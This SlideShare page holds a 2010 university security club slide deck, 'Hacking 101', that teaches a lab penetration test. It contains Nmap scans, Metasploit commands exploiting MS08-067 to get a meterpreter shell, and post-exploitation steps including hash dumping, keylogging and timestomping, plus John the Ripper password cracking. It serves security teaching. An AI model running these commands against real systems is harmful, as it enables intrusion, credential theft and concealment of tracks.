SlideShare a Scribd company logo

Hacking 101

UTD Computer Security Group
UTD Computer Security Group

An overview of penetration testing with Backtrack. Walks through the enumeration, exploitation, and post exploitation process.

Technology
1 of 15
Download to read offline
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair
Tonight  Out first “interactive” meeting  Introduction to Backtrack  A mini penetration test  Scenario  Outline  Enumeration, Exploitation, Post Exploitation  Exercise  Summary  Resources
Scenario  Company X wants you to test if their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations.  You take it back to the lab and begin to test it...
Outline  Enumeration  OS, services, versions, filters  Exploitation  Exploit a known vulnerability  Get shell access to the box  Post Exploitation  Shell is just the beginning... ;)  Hashes, SSH / GPG keys, pivot
Enumeration  'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org  nmap [Scan Type(s)] [Options] {target specification} Scan Types  -sS, Syn  -sT, Connect  -sA, Ack  … Options  -O, OS  -sV, services  -v, verbose  …
… Enumeration  nmap 192.168.1.1  Default scan, Syn, top 1000 ports  nmap -v -sV -O 192.168.1.1 -p 1-65535  Verbose, services, OS, ports 1 through 65535  nmap -PN --script=smb* -sV -O 192.168.1.1  Don't ping, run all smb* scripts, service, OS
Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally ... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ ... | smb-check-vulns: |_ MS08-067: VULNERABLE
Exploitation  Metasploit – Penetration Testing Framework  tools, libraries, modules, and user interfaces  # msfconsole  msf >  use windows/smb/ms08_067_netapi  msf exploit(ms08_067_netapi) >  set RHOST 192.168.1.1  set PAYLOAD windows/meterpreter/bind_tcp  exploit
Post Exploitation  Gather useful information  SSH & GPG keys, hashes, etc...  Pivot  meterpreter > hashdump  sysinfo  keyscan_(start | stop | dump)  timestomp  migrate  shell
… Post Exploitation  We dumped the hashes... now what?  Pass the hash  Crack the hash  John the Ripper  a tool to find weak passwords of your users  John [options] password-files  --wordlist  --users, --groups  --session, --restore
… Post Exploitation  John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU
So... let's get started  Boot up to your Backtrack CD  passwd  /etc/init.d/networking start  startx  Follow along... let's pwn this box :)
Summary  Clearly... Company X's default user workstations needs some work.  Now let's do the paperwork!... just joking ;)  Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process.  We want feedback, please!!!!  Feedback will steer this organization!!!!
Resources  utdcsg.org  Forums - please register!  IRC - irc.oftc.net, #utdcsg  Email - info@utdcsg.org  Nmap - nmap.org/5/  Metasploit - metasploit.com/  John the Ripper - openwall.com/john/
Thanks  Next meeting March 24th, 8:30, ECSS 2.306  Cracking WPA  ARP spoofing (traffic redirection, password sniffing)

Recommended

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 
Os Vanrossum
Os VanrossumOs Vanrossum
Os Vanrossum
oscon2007
 
Os Cook
Os CookOs Cook
Os Cook
oscon2007
 
2.Format Strings
2.Format Strings2.Format Strings
2.Format Strings
phanleson
 
Buffer overflow null
Buffer overflow nullBuffer overflow null
Buffer overflow null
nullowaspmumbai
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
PROIDEA
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python tools
Jose Manuel Ortega Candel
 

Recommended

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 
Os Vanrossum
Os VanrossumOs Vanrossum
Os Vanrossum
oscon2007
 
Os Cook
Os CookOs Cook
Os Cook
oscon2007
 
2.Format Strings
2.Format Strings2.Format Strings
2.Format Strings
phanleson
 
Buffer overflow null
Buffer overflow nullBuffer overflow null
Buffer overflow null
nullowaspmumbai
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
CONFidence 2015: DTrace + OSX = Fun - Andrzej Dyjak
PROIDEA
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python tools
Jose Manuel Ortega Candel
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
amiable_indian
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
Kurt Baumgartner
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
Peter Hlavaty
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux
chinkshady
 
Lecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationLecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administration
Mohammed Farrag
 
Lets make better scripts
Lets make better scriptsLets make better scripts
Lets make better scripts
Michael Boelen
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
Pixie Labs
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usage
Sylvain Cortes
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
Jason Lang
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
Nabil Munawar
 
Safe Wrappers and Sane Policies for Self Protecting JavaScript
Safe Wrappers and Sane Policies for Self Protecting JavaScript�Safe Wrappers and Sane Policies for Self Protecting JavaScript�
Safe Wrappers and Sane Policies for Self Protecting JavaScript
Phú Phùng
 
penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.
luigi capuzzello
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
Mikhail Sosonkin
 
FreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleFreeBSD Jail Complete Example
FreeBSD Jail Complete Example
Mohammed Farrag
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment
isc2-hellenic
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 

More Related Content

What's hot

7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux
chinkshady
 
Lecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationLecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administration
Mohammed Farrag
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 
FreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleFreeBSD Jail Complete Example
FreeBSD Jail Complete Example
Mohammed Farrag
 

What's hot (20)

Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux7 strace examples to debug the execution of a program in linux
7 strace examples to debug the execution of a program in linux
 
Lecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administrationLecture 3 Perl & FreeBSD administration
Lecture 3 Perl & FreeBSD administration
 
Lets make better scripts
Lets make better scriptsLets make better scripts
Lets make better scripts
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usage
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
Safe Wrappers and Sane Policies for Self Protecting JavaScript
Safe Wrappers and Sane Policies for Self Protecting JavaScript�Safe Wrappers and Sane Policies for Self Protecting JavaScript�
Safe Wrappers and Sane Policies for Self Protecting JavaScript
 
penetration testing - black box type.
penetration testing - black box type.penetration testing - black box type.
penetration testing - black box type.
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
 
FreeBSD Jail Complete Example
FreeBSD Jail Complete ExampleFreeBSD Jail Complete Example
FreeBSD Jail Complete Example
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment
 

Similar to Hacking 101

Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
Amanpreet Singh
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 

Similar to Hacking 101 (20)

Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Nmap scripting engine
Nmap scripting engineNmap scripting engine
Nmap scripting engine
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
BackTrack5 - Linux
BackTrack5 - LinuxBackTrack5 - Linux
BackTrack5 - Linux
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Hta w22
Hta w22Hta w22
Hta w22
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Privilege Escalation with Metasploit
Privilege Escalation with MetasploitPrivilege Escalation with Metasploit
Privilege Escalation with Metasploit
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 

More from UTD Computer Security Group

More from UTD Computer Security Group (20)

Py jail talk
Py jail talkPy jail talk
Py jail talk
 
22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)22S kickoff 2.0 (kickoff + anonymity talk)
22S kickoff 2.0 (kickoff + anonymity talk)
 
Cloud talk
Cloud talkCloud talk
Cloud talk
 
UTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domainUTD Computer Security Group - Cracking the domain
UTD Computer Security Group - Cracking the domain
 
Forensics audio and video
Forensics audio and videoForensics audio and video
Forensics audio and video
 
Computer networks and network security
Computer networks and network securityComputer networks and network security
Computer networks and network security
 
Intro to python
Intro to pythonIntro to python
Intro to python
 
Powershell crash course
Powershell crash coursePowershell crash course
Powershell crash course
 
Intro to cybersecurity
Intro to cybersecurityIntro to cybersecurity
Intro to cybersecurity
 
Intro to Bash
Intro to BashIntro to Bash
Intro to Bash
 
Web Exploitation
Web ExploitationWeb Exploitation
Web Exploitation
 
Network Exploitation
Network ExploitationNetwork Exploitation
Network Exploitation
 
Penetration Testing: Celestial
Penetration Testing: CelestialPenetration Testing: Celestial
Penetration Testing: Celestial
 
Introduction to Exploitation
Introduction to ExploitationIntroduction to Exploitation
Introduction to Exploitation
 
Cryptography Crash Course
Cryptography Crash CourseCryptography Crash Course
Cryptography Crash Course
 
Fuzzing - Part 2
Fuzzing - Part 2Fuzzing - Part 2
Fuzzing - Part 2
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
 
Protostar VM - Heap3
Protostar VM - Heap3Protostar VM - Heap3
Protostar VM - Heap3
 
Heap Base Exploitation
Heap Base ExploitationHeap Base Exploitation
Heap Base Exploitation
 

Recently uploaded

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

Hacking 101

  • 1. Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair
  • 2. Tonight  Out first “interactive” meeting  Introduction to Backtrack  A mini penetration test  Scenario  Outline  Enumeration, Exploitation, Post Exploitation  Exercise  Summary  Resources
  • 3. Scenario  Company X wants you to test if their internal boxes are secure. They have given you a sample box with the default security settings the company uses for all user workstations.  You take it back to the lab and begin to test it...
  • 4. Outline  Enumeration  OS, services, versions, filters  Exploitation  Exploit a known vulnerability  Get shell access to the box  Post Exploitation  Shell is just the beginning... ;)  Hashes, SSH / GPG keys, pivot
  • 5. Enumeration  'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org  nmap [Scan Type(s)] [Options] {target specification} Scan Types  -sS, Syn  -sT, Connect  -sA, Ack  … Options  -O, OS  -sV, services  -v, verbose  …
  • 6. … Enumeration  nmap 192.168.1.1  Default scan, Syn, top 1000 ports  nmap -v -sV -O 192.168.1.1 -p 1-65535  Verbose, services, OS, ports 1 through 65535  nmap -PN --script=smb* -sV -O 192.168.1.1  Don't ping, run all smb* scripts, service, OS
  • 7. Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ... Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally ... | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ ... | smb-check-vulns: |_ MS08-067: VULNERABLE
  • 8. Exploitation  Metasploit – Penetration Testing Framework  tools, libraries, modules, and user interfaces  # msfconsole  msf >  use windows/smb/ms08_067_netapi  msf exploit(ms08_067_netapi) >  set RHOST 192.168.1.1  set PAYLOAD windows/meterpreter/bind_tcp  exploit
  • 9. Post Exploitation  Gather useful information  SSH & GPG keys, hashes, etc...  Pivot  meterpreter > hashdump  sysinfo  keyscan_(start | stop | dump)  timestomp  migrate  shell
  • 10. … Post Exploitation  We dumped the hashes... now what?  Pass the hash  Crack the hash  John the Ripper  a tool to find weak passwords of your users  John [options] password-files  --wordlist  --users, --groups  --session, --restore
  • 11. … Post Exploitation  John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU
  • 12. So... let's get started  Boot up to your Backtrack CD  passwd  /etc/init.d/networking start  startx  Follow along... let's pwn this box :)
  • 13. Summary  Clearly... Company X's default user workstations needs some work.  Now let's do the paperwork!... just joking ;)  Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process.  We want feedback, please!!!!  Feedback will steer this organization!!!!
  • 14. Resources  utdcsg.org  Forums - please register!  IRC - irc.oftc.net, #utdcsg  Email - info@utdcsg.org  Nmap - nmap.org/5/  Metasploit - metasploit.com/  John the Ripper - openwall.com/john/
  • 15. Thanks  Next meeting March 24th, 8:30, ECSS 2.306  Cracking WPA  ARP spoofing (traffic redirection, password sniffing)